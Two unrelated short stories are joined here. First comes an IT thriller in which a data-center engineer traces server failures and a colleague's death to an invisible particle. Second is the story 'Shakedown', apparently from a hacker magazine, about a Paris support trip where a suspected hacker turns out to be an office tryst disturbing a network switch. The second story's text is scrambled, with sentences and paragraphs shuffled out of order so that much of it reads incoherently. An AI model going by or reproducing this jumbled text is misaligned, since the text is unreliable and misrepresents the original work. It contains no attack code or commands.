“No shit. You’re gonna have a long day.”

“Save me some of that disgusting pizza you always buy.” He opened all the service requests.

~oOo~ The certificate server was toast. Three interfaces lost connection with the network and the system would not boot. Clearly though, every attempt to bring the system back up failed. The new component and the technician to replace it were dispatched. The project manager should have budgeted for a backup system, but it was caught up in financial purgatory. Two other systems fared a little better: another bad power supply, a failed video display adapter. Another clustered system lost all four hard drives. All four! The failure messages occurred about 3 minutes apart on each disk. It seemed impossible that there could be any common thread to all these failures, but then he was facing the prospect of explaining why there wasn’t. Loose ends were not for him. He had to understand the situation, and as of right now he couldn’t. He called Big Bill with the updates, and got in the shower. He rocked his head in fatigue and exasperation as the warm water sprayed over him. He stood still, closed his eyes for a moment and let the water run down his face. The rain had returned as a light drizzle. The drive to the data center that early in the morning was decent, traffic had not yet begun to build.

Micah was channel surfing on satellite radio, when a song from the late ‘60’s Stones album Beggar’s Banquet filled his car:

There’s a regiment of soldiers
Standing looking on
And the queen is bravely shouting, “What the hell is going on?”

What the hell, indeed.

~oOo~ The data center was housed in a long, single-level building with a faded green scalloped façade that ran all the way down the front, a few steps from the front parking lot. The structure looked like a rectangular slab of concrete pushed into the side of a gentle sloping hill. The view from the front of the building was quite pleasant, looking east over suburban Philly and the Delaware Valley. A large security screening entrance sat directly behind the main double doors. In the center of the structure, surrounded by office space, was the actual raised-floor server room, with rack after rack of computers arranged in rows like bookshelves in a library. Two additional security doors separated the office space from the server room entrance. It was a highly controlled environment; no one was admitted unless they had multiple approvals, and even then access time was strictly controlled. Video cameras taped all activity in the room.

After clearing security, Micah turned left and walked directly to his office, halfway down the main hall. The ever-present smell of coffee and laser toner filled the office. A few other early birds were also there this morning. Big Bill had left, no doubt exhausted by the long shift full of problems he’d handled, so he talked for a moment with his good friend Pete Baird who’d also just come on duty. He gave the operations center a quick call to let them know he was on site. He gulped down a cup of weak coffee, then set about his work in recovering the most critical system, starting with the certificate server.

~oOo~ By 10 am, the field technicians had replaced all the hardware and the most critical recoveries were in progress. All Micah could do now was wait for the recoveries to complete before tackling the less-critical problems that remained. He sat in his office, looking at a pile of computer parts on his desk. There was nothing remarkable about their appearance, but they’d all failed in an 18-hour period. It was a vivid reminder of his current dilemma.

Hromka came bounding into his office. Even though Micah didn’t report directly to him, he still made life miserable for him and attempted to control his time whenever he thought it would be to his benefit. “Mr. Gardner! Good morning! I’ll bet I know what you’re working on.” Chatty manager. Wasting my time. Without turning his head away from his work, he embellished the disdain in his voice for Hromka’s benefit. “Well, I’m sure you do.” He continued to focus on his recovery notes.

“I need to know what the hell is happening in my data center, and I’m counting on you for answers. I don’t like taking calls from our CIO asking me why people can’t log in to our site. Downtime. Thousands of dollars in lost revenue. Bad, very bad.” Hromka’s hands were on his hips in a forced, confrontational pose.

“Well, I’m sure we’ll have some answers for you, but it will be after we get these systems back up.”

“Look, I know we have to get these servers back online, and I appreciate your efforts, but I just need to know what’s causing all these failures, and you need to show some urgency about that.”

Only then did Micah turn to face the man. Micah glared at him. He got up and walked forward until he was nearly toe-to-toe with the sniveling manager. He smiled and spoke firmly and plainly. “Well Wayne, as far as your precious numbers, why don’t you cut our service contract, like you did last time? I’m sure another four hours of downtime while waiting for technicians and parts won’t make that much difference. The sooner you let me get back to my recoveries, the sooner you’ll have your answer.” He might’ve stopped there, but he didn’t. “I see you put Jessie’s position up for bid. It’s been almost two whole days since she died, have you filled it yet?” With that, he silently counted to three, then turned around and sat back down at his desk. His adversary was clearly taken aback. They both heard it: the muffled snickers of employees who overheard the conversation. As Hromka spun around and stomped back down the hall, smatterings of muted applause were heard all over the south end of the office. Micah stifled a smile himself.

The floor plan of the server room was hanging on his wall. In his left hand was the report detailing the affected servers, failure time, and cabinet locations. He stared intently at the drawing, examining the grid of rows and cabinets. One by one, he drew an “X” on each cabinet location that contained a failed server, the certificate server followed by all the others in the order they failed. He included the network router that had also failed. All the X’s fell in a straight line, starting near the southwest corner and running diagonally across the server room. The Accounts Payable server was the first X on the line. There was a connection. Sweat formed on his upper lip, and he grabbed the armrests of his chair. When the realization came, he sat straight up in his chair and leaned forward as his back stiffened. Of course. There was something. He pulled out his calculator and ruler. With one broad sweep of his now-shaking arm, he cleared his desk of all the failed parts as well as his other papers. He pulled the floor plan off the wall, ripping the corners away from the pins that had held it up, and spread it out on the space he just created. Dividing distance by time, he further realized that the elapsed time between any two failures was proportional to the distance between them. In other words, something was moving at a slow but constant speed across the server room. He understood what the facts were plainly telling him. Whatever this thing was, it was burning out components and downing his servers, taking out any device in its path.

~oOo~ He started up the certificate server. It came up fine and he saw users begin to connect to the system. He took a few deep breaths and a sip of his coffee. As he returned to his office with more coffee, Micah took stock of a few facts. All of the servers that failed were mounted near the bottom of their respective cabinets, roughly one foot off the server room raised floor. Thus the particle was traveling at a constant height. And based on the lack of any image on the security video, the particle was invisible. He returned his attention to the computer room floor plan, the thin diagonal line drawn across it. He’d determined that this thing, this particle or destructive point, as he thought of it, was moving at just under two feet per hour across the server room. Extending the line on the floor plan, and adding the number of hours since the last failure, he calculated that the particle, roughly 50 feet south and west of the first server that failed, should now be inside the new backup tape silo. The silo was about the size of a small minivan and contained storage space for thousands of data tape cartridges, along with jukebox-like robotics that pushed the tapes into backup drives. Being brand new, it was not yet used for actual data backup. It was, however, powered up and operational, or was it? Micah logged into the silo remotely from his workstation and issued a few commands to see if the robotics would respond. He repeatedly got “device not present” errors. Hallelujah. The particle had also wiped out a $1.5 million tape silo. Then he double-checked all his calculations thus far. The particle was done wreaking havoc in the server room. Since taking out the silo, it was now past any critical equipment. Its trajectory was taking it out into the hallway some time in the next 6-8 hours. He realized he needed a blueprint of the entire building, not just the server room, to find the extended path of the particle. Although he had figured out its behavior, he obviously had no idea what he was up against. He began to simply accept what was happening. Clearly he could not share this with anyone just yet. He was also mindful that he didn’t want to appear defensive if suddenly challenged by someone about the outages. For now, he was keeping this secret. He exhaled deeply, and sent Hromka an email updating the recovery timeline.

~oOo~ It was 11:30 am. Pete Baird knew nearly as much about this place as Big Bill did, since he opened up this building for the company nine years ago. He might have something helpful. As his ID card opened the operations center door, he saw Pete at his desk. One look told him that his friend was not his usual jovial self, and something wasn’t right. “Petey, you okay?” He managed a weak smile when he saw Micah approach. “It’s just this business with Jessie really got to me, all these server issues, and lack of sleep mainly.” Pete put his game face back on, deftly changing the subject by congratulating Micah on his dressingdown of Hromka earlier in the day.

~oOo~ Pete and Micah went to the break room, but it was noon and packed with employees eating lunch, so Pete bought him a cream soda, before buying his own cola. There was an empty conference room close by. They left the break room holding their cold drinks to find a quiet place to talk. Micah walked in first. Pete shut the door. Pete put his cola down on the conference room table. “Okay, so what was it that made you pale as Casper back there?” Micah exhaled and shook his head, drinking his soda. Pete knew him too well. “They want me to come up with a good explanation for all these failures, and I can’t.”

“You’re bullshitting me. You know damn well you’ll figure it out, mi amigo, you’re the best there is.” Micah’s hands were shaking a little, and it was obvious to Pete.

“Thanks for the support. Maybe we can talk about it later. There are some things I have to take care of before I can say anything, that’s all.”

“We’ll definitely talk later, smartass.” Pete gave his buddy a mock punch in the ribs. “Listen, ah, I have to get this thing with Jessie off my chest.” He quieted his voice to just above a whisper. “I saw her Monday and there was nothing wrong with her. I went to see her about some batch jobs Tuesday morning..” Pete turned away as his voice started to quaver. Micah knew what Jessie had meant to Pete, and Micah felt the utmost empathy for him. Their friendship, and Pete’s obvious affection for Jessie, was the main reason he never pursued her himself.

“You think the stress caused her cancer to return?”

“No, no. I thought maybe that prick Hromka did something that upset her.” Pete paused for a long time, then took a sip of his cola before speaking. “This freakin’ place killed her. I just know it. I swear to God.”

At that moment — at that very second — another wave of realization came over him. Jessie’s cubicle was behind the server room wall. He didn’t need to see the floor plan, he saw the diagonal line in his mind’s eye, and he already knew. Pete was right, that’s for sure. This place had killed her. He had to sit down. This time his face blanched white.

“You gonna pass out on me? Sit down.”

“It’s alright man.” He held the cold, wet aluminum can against his forehead. Once again he took a deep breath, and looked out the window at the rain, which had picked up in intensity again. His smartphone buzzed again. It was 1:45 pm. “My recoveries are almost done. Listen, I’m gonna finish up and work on these last few systems.”

“You planning on going to the visitation tonight?”

“Yeah.”

“Can you give me a ride?”

“Sure. I’m not staying long, though.”

“I know, neither am I.” Micah turned back toward his friend with a halfsmile. “Thanks for the support.”

“Anytime.” He drained the rest of his soda, tossed the can in the trash, then shook Pete’s hand and grabbed his shoulder. Pete put his game face back on, grabbing him firmly on the shoulder, then walked down the hall toward the operations center. He’d made tick marks along the line corresponding to the time, one per hour.

~oOo~ It was now 4 pm. With all the systems back in service, he grabbed a yellow legal pad and walked briskly down the hall to Hromka’s office. “Wayne, I was wondering what your schedule looks like tomorrow, you gonna be around all day?” Hromka sighed with irritation as he opened his online calendar.

“I’ll be here on a conference call from 9:30 to 11, then I’m interviewing a job candidate at 11:30.” Micah pretended to write something on his pad. Not for Jessie’s job, of course. “I have 1:15 available.”

“I have some preliminary ideas about these failures I want to discuss with you.”

“I can’t wait to hear about this. What did you find?”

“Again it’s only preliminary, but I think we have a power distribution issue.” He tried to sound conciliatory. “Uh, I’m thinking we may have power issues.”

“No. Our power is solid. The building engineers assured me of that today.”

“Well I have good evidence of this, but I want to get my facts together and present my case tomorrow.”

“Damn it, Gardner, I want to know now.”

“No way. I’ll see you here tomorrow at 1:15.”

“Okay. We’ll meet here in my office, and I’d appreciate you being on time. If you try to blame this on power and you can’t back it up, I will drag your ass through mud.”

Micah couldn’t help swallowing. “Yup.”

“Well smartass, you’d damn well better not screw this up.”

Micah had had it. “Wayne! It was my pleasure to spend the whole day getting your site back up. I appreciate your gratitude.” Micah smirked at him scornfully and spun around to leave. Hromka’s face flushed red but he said nothing.

He still needed the blueprint of the whole building. He went back to the operations center and quizzed Pete about the building plan he was looking for. Pete looked up at him with a knowing grin. “If those blueprints are anywhere, they’d be in there.” Pete reached into his desk drawer. “These are the keys to Big Bill’s desk. But you didn’t get this from me.” He wagged a finger.

“I owe you once again.”

“Yes you do. You’re welcome, amigo.” Pete smirked at his buddy. “Cheer up, amigo, I hear better days are ahead for Uni*Star. Are you up for happy hour tomorrow night at Jonesey’s? You know what they say: ‘Sober on a Friday night, sober and alone.’” Micah snickered at Pete’s weak impression of Hromka. “We can drink to Jessie. Or anything else we might want to drink to.”

“I’ll meet you there.” He made a face as he reached across Pete’s desk for a disgusting slice of leftover pizza. He looked up at Micah.

~oOo~ Big Bill’s desk was filled with garbage: old software, trade rags from five years ago, 9600 baud modems, serial cables, and other assorted dreck, including a bunch of menus from that disgusting pizza place. One long drawer contained dozens of rolled-up blueprints. There were no labels identifying them in their rolled state. He noticed one in particular that looked a little dingy, like it had been handled quite often. He unrolled it, realizing he had guessed right: this was the blueprint of the whole building. The detail of the offices was there, but this drawing was made before the cabinets were installed in the computer room. Nor could he overlay his data floor drawing onto the blueprint, since they were drawn to different scales. Micah was going to have to get creative. Eventually, he came upon the idea of marking the entry and exit points of the particle on the data center walls and transferring those proportional distances to the blueprint. He double-checked his points by comparing the respective scales.

~oOo~ Back in his office, he studied the path. All the systems that were affected were mounted one foot high in their respective cabinets, as he already knew. But since the server room had a raised floor, the particle was actually at a height of three feet when it passed through Jessie. Its height would once again be three feet later tonight in the office area. When he connected the points now, he had an idea where the particle was heading, but he had to know precisely. Returning his attention to the blueprint, Micah followed the line on the drawing and carefully extrapolated its path. The particle must’ve come straight out of the woods and the hillside behind the building. It entered near the rear service dock, passed through a recycling bin and the internal rear building wall, then directly through Jessie’s cubicle. Then it entered the server room. The particle had just exited the back of the silo and was an hour or so from the inside wall. It would travel through the thick concrete wall at a sharp angle for another three hours. By the time it entered the hallway it would be well after 6 pm, when there would be no one in the office area. This evening, he followed the path the particle would take tomorrow morning. By 6 am, it would be in the main hallway. By 10 AM, it would be nicking the inside corner of Vishy K’s office. Tomorrow morning it would be making its way through the last row of offices before exiting the building’s east wall sometime tomorrow afternoon. Eventually, it would be approaching the desk of Mr. Wayne Hromka. Bad, very bad. Since the terrain in front sloped downhill, it’s likely the particle’s level path would take it out hundreds of feet above the Delaware Valley and, somehow, over New Jersey and the Atlantic ocean beyond.

Back in his office, Micah used a wooden yardstick to tear his server room drawing roughly into letter-size sheets. He did the same with Big Bill’s blueprint. He took the stack of paper to the copy room and fed it to the shredder, then re-locked Bill’s desk and brought the key back to Pete.

and I did.” I groaned. “but if the problem is not because of hardware. My manager wanted me to fly out to deal with it. “It’s too short notice.” “Seriously though. I would be the engineer with his name at the top of the hand-over document. And. The image I was getting of some hacker bragging about breaking into a network to steal a chart detailing 256 different shades of lipstick was amusing. I needed to figure out what had gone wrong and who had made it go wrong. Apart from the traveling. They were always hectic.” I said. you might as well go home right now and start packing. if all I have to do is a write-up.” “What’s going on?” “The client’s lawyer has convinced them that they’ve got a hacker in their network. and dropped behind the cabinet. “Did you ask Bridget? I bet she’d enjoy a trip to Paris.” “Everything else can wait.” Nothing new there: company trips always had the highest priority.” But I could. sending a sponge missile toward the white-board. “I wish I could put it off. but I had been on company trips before. and was wary. just to work on a document that I could email to them. I would be the one to blame. and one of their foreign clients.” my manager interrupted. . and I didn’t want to be around when it went into meltdown. a French cosmetics company. And when you came back. “Sorry. . It had happened before. Maybe I could find the problem–” “Sorry.” “Tomorrow? Tuesday?” I accidentally hit the mouse button. It’s the idea of going all the way to Paris at this time of year. was having network problems.” I said. and then everybody could stop panicking about phantom hackers. then don’t you need a security expert to look at it?” “No.” “This is more important. it was a subject that interested me. I can’t just drop everything and fly to France tomorrow.” I stopped aiming the desktop missile launcher at the target I had drawn on the white-board and sat up. The hand-over date is Friday. If you can stall them for a couple of days. 
it sounded like it had gone critical.THE HACKER DIGEST . We could have goofed somewhere down the line. trying to figure it out. I didn’t get to see any black hat hackers.” My manager said nothing. but it’s urgent. I’ve got customers screaming at me. I was up at 4:00 the next day. bounced off the wall. last-minute arrangements. there would be half a dozen other managers asking you why their work was late. But I could see what was going to happen. and the only advantage to having irate clients taking their frustrations out on you was that you learned to swear in a foreign language.” I said. You had to drop everything and go. The police will handle the rest. “Okay.” “I need you on this one. It’s going to be embarrassing if a monthlong police investigation turns up a server with a glitch that someone should have spotted. because of your documentation skills. “there’s another possibility here. but I did get a lesson in how hysteria can be used to blind otherwise intelligent people to the truth. and by 6:30 I
. or at least would have gotten involved in if the whole thing had not turned out to be hype.VOLUME 26
I recently watched the video Freedom Downtime. I was the reason it all went sour.” I sat for a moment. “Did you just say ‘police’?” “Yes. “Why would someone want to hack into a cosmetics company? I mean.” my manager said. and it reminded me of a hacker alert that I got involved in. My first guess was that one of our own people had messed up somewhere. I need to get everything done before we close for the holidays. All you’ll need to do is to document the background–everything the help-desk and support people have done so far–and then hand it over. that’s not possible. “This has the highest priority. I couldn’t get stuck on this job. and there was a silence while I tried once again to get my head around it all. and the bottom of the helpdesk fault list. and up to that point I had managed to maintain a blemish-free record. Though I have never done any hacking myself. “but I’m stuck on project work that I need to finish before my Christmas vacation. The only sightseeing you got to do was the inside of a server room. I had to get out of going.” “Not like this. “You know. I’d been with the company for sixteen months. and what the client is seeing is a side effect. The client has already called in their lawyers. Can you do it?” “The service agreement is probably workable.” I didn’t quite laugh. Anyway. “Yes. and the client does have a hacker in the network.”
SHAKEDOWN
Fiction by Peter Wrenshall
“We have network problems all the time. Most people would have probably jumped at the chance of a paid break in Paris. The SA on this is Friday. “Sorry.” I said. In the end. I was the last guy to touch it. I was working for an IT support firm. in fact. The client already has you on an early flight. that would give me time to remote in. Someone is targeting executives. The missile missed the target. and now they’re talking about bringing in the police. do they have any evidence?” “They’ve had a series of network issues . I wasn’t sure the client had been hacked.

just as you were packing up. ready to get out the door. saying that neither they nor the French consultant had found any technical issues. On the way up to the top floor. though obviously not happy enough to smile. Maybe. On the wall was a photo of a French actress I had seen in a movie a few months before. things started to get interesting. When the pilot announced there was going to be a delay. And. the company. and marketers dared to dream of agency kickbacks from the supermodels who would get paid millions to be seen wearing it. rather than playing the game. and I said that they would have their hand-over document by Thursday afternoon. We all got drinks. to my surprise. I landed in Paris just as it was waking up. eventually. I was met by the head of security. and they had nicknamed me “100%. She asked me if I wanted a drink. he told me how “urgently important” it was for the company to get this problem dealt with as soon as possible. he thanked me for coming and said that the CEO wanted to see me. She was modeling the company’s new eyeliner. and. had to pay for a French consultant to go in and do his own tests. who started using phrases like “breach of contract. Clients were always doing that: finding new problems. I only had a few days to get involved. As expected. but I had already decided to go one better: I would write it up for myself. The security guy fired questions at me. and all the rest of it. They reported the “crash” to the help-desk. a duty of care for both the network and the commercial data on it. it wasn’t that far off the mark. At that point. and then we sat and chatted. which I fielded. which was about a network breakin. So I knew how to invent work for myself.
. We walked and talked until we got to the executive area. and threatening the shift manager. In the previous six months. it got explained away as a network glitch. and then she surprised me by saying. and by 9:12 I was sitting in the reception area of the client’s office.” For a moment. They wanted reassurance from me. And for a little while. And then. neatly dressed woman in her forties who said that she was happy to see me. it looked like there was a hacker in the network after all. there would no doubt be an opportunity for me to get unofficially involved. I thought that something must have gotten lost in the translation. everything was quiet. The tests turned up nothing out of the ordinary. I said yes. Hackers were still very much in the public interest. I nodded. A few minutes later. a place where every stuffed suit had their own office. getting an “insider” view. and that seemed to satisfy them. She tried a few remedial actions to rescue it. Fired up. More tests and scans were run and. Interesting. The CEO was a tall. “I am told you are the top guy in the computer department. despite my initial cynicism. Then I realized that my boss had obviously talked me up. I might even end up working with the cops. and since then I’d been thinking about doing something similar. waiting. who remoted in and ran a bunch of tests to see what was wrong. I had not missed a single project deadline or failed a help-desk SA. It had all started two months earlier. But a few days later. They persuaded the CEO to call in the French equivalent of the Cyber Crime Division. it at least stopped the suits from barking. If I could get a publisher interested in it.
was on a plane. the lawyers started talking about network security and hackers: cosmetics companies came out with new formulas all the time. True. I had read a best seller. the sharks said. and I noticed the tagline was in English. this could be my ticket out of computer support. the CEO had been working late when she got hit by it. or Friday morning at the latest. when a couple of executives had suddenly and mysteriously lost the documents they had been working on. except his invoice. So. The help desk was getting endless complaints. And while he came up with nothing suspicious. But over the next two weeks there were two more incidents. the same thing happened to half a dozen other management stiffs. Years before.” The company fired back. but dead is dead. this corporate hack that I had stumbled onto was my material. Then one night. putting it all into a book. and I knew there was good money to be made out of the talk-show circuit. and began to read up about the saga. the client escalated the problem and we. to try to calm her. I’d be switching to a new career. My manager had asked me to write it up. but a quick trip to the server room to make a few unofficial “adjustments” would solve that problem. in shaky English. but in French. At that point. Here was the top of the fashion world. since I would be staying in Paris for an extra couple of weeks. noncommittally. dressed in my good suit and the duty-free tie that I bought on the previous trip. telling me about how they felt let down. and some of them were worth millions. and the incident was eventually put down to a “cockpit error” (help-desk code for user stupidity). taking the “business critical” document she had been working on with it. Everything had been locked down for days. The other staff thought this was hilarious and assumed that I was some fanatic. But I still had memories of pedaling to work in the rain to keep me overachieving. If I did things right. I took out the help-desk logs. 
The Cuckoo’s Egg. The next day she called in the lawyers. and then the CEO took her turn. including screaming at the help desk.” Nothing gets office clerks talking more than the presence of someone who is working his way to the top. We had. Besides. The error messages told her the network connection had died. though I had seen the same ad back home. they unburdened themselves of their frustrations. I got out my laptop and started a journal. and that started phones ringing. and every office had its own unique personality. where visionaries dared to dream of a redder lipstick. I thought. He was stocky with a shaved head. so I would have something to refer to when I got home and started writing my best seller.

Full marks pour moi. The more fashions change. I made a start on my own unofficial investigation. The local skeleton crew IT staff said bonjour. After dinner. “I have to check the network ports. or the new woman who had just started working in the
. Inside were the familiar rows of network switches. The next day was a carbon copy of the first. “I’m sorry. and watching white flakes slowly drift down out of the darkness and onto people as they darted in and out of shops and restaurants. but the French language being what it is. but it was just a better class of boredom. I went downstairs and fired up the word processor. It looked like someone had translated the headquarters of a Bond villain into French. at 1:30. They were obviously both in the wrong place: the last things they needed were cosmetics. getting nothing but green lights. Was something loose somewhere? I tugged a few cables. I decided to get something to eat and followed the signs to the cafeteria. the tests showed there were no defective ports. as expected. I told the CEO and the security guy about my reservations. Apart from the clinking of cutlery.
And yet. I would walk around the exec suite with a port-tester. as I sat there chatting professionally and sipping café au lait that tasted far too good to be decaf. The dark-haired one said something to me. To try to work it out in my own mind. I went into an explanation of the difference between an organized criminal who was in it for the money and a computer hacker who was in it for the technology. I began by visiting each of the comms rooms. organized or not. and when the person was caught. At the table were two women. I’d never stayed in such an upmarket place before.” the CEO said. Welcome to the exciting world of cosmetics. and I was going to ask them where the famously romantic part of Paris was supposed to be. and patching all this together was the usual spaghetti of network cables. I spent another half hour sitting on a snow-covered bench in the middle of a square. mixed in a few buzzwords. It was a large room with a polished wood table in the middle surrounded by stylish chairs. I put all the boring details of the day into my takedown diary and. One of the rooms was a conference suite. trying to remember some school French. and. added some topology diagrams. and was looking forward to it. I wandered through empty rooms. The bad guy was wearing a tall black hat with a buckle on it. I started with the firewall and server logs from the time of the events. I ate my sandwich. Hundreds of years ago. at 6:00. I thought. before settling down to do the documentation. he would be sentenced to hard labor. and the women he was waving a bible at were all wearing bonnets. I decided that since I was on the top floor. From the way her dark eyes were blazing. and then. this room is not available now. All the smart comments about French women that I had heard before I left the office were wasted. On the wall was a massive flat-screen display. just put her hands on her hips. He sat me in front of someone’s desk. my official task was nearly complete. 
and took me down to the IT support room in the basement. Every day there was some new story. After that. My little investigation had failed to throw up any obvious errors. as we stood and shook hands. Something about what they were telling me didn’t quite fit. with their blinking lights and whirring fans. “There is a lot at stake here. I heard some tourists speaking English. “Pardonnez-moi.” she said. “Parlez-vous anglais?” She didn’t answer. everything was in order. “Please come back after one o’clock. Very little happened.” I dropped the CEO’s name into the conversation. The two women had gone and. and I started thinking about hackers again. because I still had the documentation to write. this spot had been the site of a famous revolution.” I said. and then hand it over on Thursday. At home. and realized that it was already afternoon. hoping to impress. I sat in a deserted hotel bar for an hour. but all that did was make the dark-haired woman bark louder. the two local support staff members were nowhere to be seen. the more they stay the same. After that. in the basement. and then he went away. I emailed my manager to let him know I had arrived and. A few hours later. about salesclerks going ape and throwing the company laptop at the wall. But apart from the fact that there were various bits of abandoned gear left lying around. All I had to do was proofread it tomorrow. and then went to my room and watched a movie about the first American settlers that was badly dubbed in French. We are counting on you. and looked at the other woman. I guessed the former. but everything seemed peaceful enough now. The other woman turned to me again and said. 
and then wedged it all on the company stationery. and then both of them withdrew to the other side of the room. Then the security guy handed me a pass. But they weren’t interested in theories or subtleties. I thought. she could have been swearing at me or she could have been reciting poetry. they said.” I looked at my watch. but they walked past. sipping decaf. I left my laptop monitoring the network and took a taxi to the hotel the client had arranged for me. obviously happy to leave me to it. which meant the hardware was working as it should. It will only take a minute. This was France. which were placed next to the emergency stairs on every floor. I went out and wandered around Paris in the dark for an hour. since I had to rule out everything. who both looked like they had been Photoshopped into their business suits. some alarm bell was sounding far off in the back of my mind. I went back to the conference suite.

and was just thinking “101%. but my brain couldn’t follow. I’d almost come to the end of my stay.” I said. and they kept me waiting while they read it. Shortly afterward. and that I would see him on Monday. Whatever was going on. What else could I say? He continued. and I hadn’t seen any black hats. when I noticed something even odder. out of sight.” I continued.”
. I got to see the CEO after 10:30.” “But all the switches have been tested. and. I could see my breath in front of me. but the cold wasn’t bothering me at all. and sat in the silence. “It’s a good result. Someone else was in the room. and looked again. and then turned back to me. when I saw that a large segment of the top-floor network had vanished. caught completely off guard. and sat on it for an hour. I gave them each a copy of the hand-over document. I jumped up and sprinted out of the office and up the emergency stairs to the top floor. It was not going to be enjoyable. He had already heard from the CEO. “Er. only this time he accompanied it with a sound like “poof. looking for a vending machine. “No need for that. it is an inside job. I went back downstairs. I took a taxi to my Paris bench. to show to the police. and just said that I had looked for technical faults and only found an unpingable DNS. An image kept invading my brain. trying to figure it out. How much of the other stuff I’d read about hackers was just as hyped? Hysteria sells. and sat down at my desk. I got a call from the CEO. A man. but I wasn’t in a rush to get back to my hotel. for some reason. After he had hung up.” I was just about to bark. “Yes. So much for the big hacker takedown. Note to self: don’t drink the Kool-Aid. I noticed that one side of her silk shirt was untucked. got to the comms room. And then I saw something else. It was after 6:00 when I noticed the time. The woman said nothing. The day was ten hours of silence. On Thursday morning. “We needed some evidence. and their expressions didn’t need translating. I sat and typed all day.” “You were supposed to document the problem. my phone rang. Whatever had been knocked loose was back up again. The woman was staring at me with those big dark eyes. it was gone. And I knew what had been interrupting the network service.” the security guy said. which by then had turned into a full-on novel. pardonnez-moi. 
and walked quickly back down to my desk. I paused for a moment.” “Defective?” the CEO said. She didn’t appear to be breathing. A woman was standing in front of the first rack. “because now you don’t need to call in the police. so I hung around. and that sort of thing. and found her and the security guy waiting expectantly. It was the woman from the conference suite on the first day. I will call the manufacturer and have it checked. “Broken.” “Okay. I got to my desk. and I realized what it was. Maintenance contract. and I was sitting there with no idea what to do. watching the people go past.” I said. The security guy was already there. not fix it. The thing I had been waiting days to see had happened at last. “Why would you want the serial number?” “Because the hardware is protected by a maintenance contract.” The security guy and the CEO looked at each other. She had a surprised look on her face. and realized that I hadn’t eaten. and how sorry they were to have dragged me away from home at this time of year. but I don’t understand. At the top of the stairs. I was about to find out. Not even slightly.” I said. since real life hadn’t been interesting enough to fill a book. he looked at the CEO. I went back to the office. “What are you doing in here. but didn’t find one. and he was calling me to congratulate me on hitting another SA. they thanked me and said that they appreciated the work I had done. “My initial thought was right. I backed out of there.” I replied. “Sorry. I was just about to turn off my machine and go to the hotel. and then went outside.” “Yes. “Yes. not getting how I was missing the blindingly obvious. I could see a reflection. pushed open the door. happily inventing exciting scenes. and wouldn’t go away. I ran through the doors. In the dark glass of one of the cabinets.” when I saw something odd. Nobody said anything. “I’ve retested the network and found the problem. I walked around the deserted corridors. I’ve already fixed it. 
It wasn’t a hacker. and why it was only the execs who were getting hit.” “Fixed it?” Puzzled. I didn’t tell him that I’d been snooping around like the Hack Finder General. I stood there for a moment. What was bothering me was the thought of the next day’s work. I went to her office. Are you telling me you just got rid of the evidence?” He made the open hands gesture again. and the network was fine. And I had almost bought it. the one with the dark hair. Yes. I switched off my laptop. It was my manager. But there was no danger of that here. After they had finished. standing behind the rack. and checked the network monitor. and wondering which actor would play me in the movie of the book. Right. My first thought was.” the security guy said. filling in my hack-attack journal. If you give me the serial number of the switch. blinked. with open hands. after all. At the prearranged time. her shirt untucked.
office. her gorgeous face flushed.” Call the manufacturer? I stood there. just a defective network switch. She didn’t move. an image of that woman. I recognized her right away. He wanted to know if I had done any additional investigation. They said that they would let my manager know that they were pleased with the service. And then it dawned on me.

and I didn’t blame him. I noticed that a woman was standing next to me. and there was another conversation in 56k baud French. and after some negotiation. “But I do not understand. and gestured for her to go ahead. When you’ve had the finger pointed at you. One of the office jokers. Then she turned to me. “Enchanté yourself. and then turned back to me. however I phrased it. But I’ve cleaned it now. The breakfast crowd had already gone. “Will you be visiting the Le Mas district?” “I hadn’t planned to. made me sound like a goon. It was something else.” I knew that as soon as the door clicked shut behind me they’d be on the phone to my manager. “I have to say that I am disappointed. “Dust was blocking the fan. but I could see right away that this was one SA I was definitely going to miss. Are there any good restaurants?” “Oh. It was a good job I did. I generally leave that sort of thing to the politicians. The CEO slit her eyes and frowned. “Enchanté. She spoke slowly and quietly: “Is there something you would like to tell us?” It wasn’t that I cared if the cyber cops charged Mademoiselle Hacker with killing business critical documents. “How can a broken switch cause such problems?” It was a good question. Hardly anything has changed over the years. I told her. “I would like you to provide me with an email explaining everything. My flight was more than eight hours away.” The CEO and security guy had a French conversation that was so fast it sounded like two modems talking.” she said. the one who had been working with Mademoiselle Hacker. “What I don’t understand is that you didn’t think to tell someone before you destroyed the evidence. just to do a final check.” she said.” “I’m not working this weekend. I made another note to myself: get a life. It said: 99%. I’d get a cup of real coffee.
Have an interesting fictional story concerning hacking that you’d like to test out on our readers? Send it on in to articles@2600.com. I had to. My phone beeped. before you go home.” After I had finished my cup of coffee. and then burned her at the stake. “I don’t drink tea. and that my record now had a large black mark against it. “Too bad you are working. I said that I would try my best. It has lots of history. finish the email. and now there isn’t any problem? And this will not occur again?” “Yes. I cringed while giving out this garbage. “Will you be in Paris long?” “A few days. “What part of England are you from?” she said. but I wasn’t about to hang around. He wasn’t buying it.” She did one of those French gestures.” she said. It was my manager. I confessed everything.. but had failed. The whole thing had caught me out. to tell them what had really happened. I had a message. I stood for a minute. and smiled. looking grimly at the cup of hot water and thinking things over: all work and no play makes Jack a dull geek. without coffee. I went back to the honeymoon suite and went around all the cables and power connectors. “No tea?” she said. I turned around and realized that it was the woman from the conference room.
“Sorry.” “Sounds interesting. Suddenly. and the place was silent. “Paris is lovely at this time of year. I looked at my watch. As I was leaving.” She smiled again. Completely random. incredulous. because I spotted a couple of server issues that had somehow previously been overlooked. typing an email that. my phone rang. and then stopped. Then she turned back to me.” Naturally.” She placed a cup in the machine. putting her curves between me and the coffee machine.” I started. and all last night I had been trying to think up some believable explanation that fit the facts. I was having a mal jour. and read it. . it gets more difficult to do it yourself. That’s right. Sightseeing. She turned her head.” The CEO looked puzzled. as if she suddenly had an insight. I could imagine the jokes when I got back to the office. “Fan?” the security guy said. too. and got a sermon about the importance of not annoying the customer. Please tell us it’s fiction so we don’t inadvertently spread a pack of lies. I phoned the help desk to report the problem. I sat at my PC. looping her hair around her ear. pushing in anything that might have been knocked loose.
. and inclined her head. making it run hot and act flaky. so it’s okay. I opened it.” “I. The CEO gave me a look that was colder than the snow outside.” “But you are English. I took the stairs down to the cafeteria. I shook my head. I went to the coffee machine and pressed the button. and got coffee. hit the button. they said that they wanted me to get the work completed by Monday at the latest.” The security guy continued. I was going to level with them.. I took a last trip to the server room. looking at my cup of water.

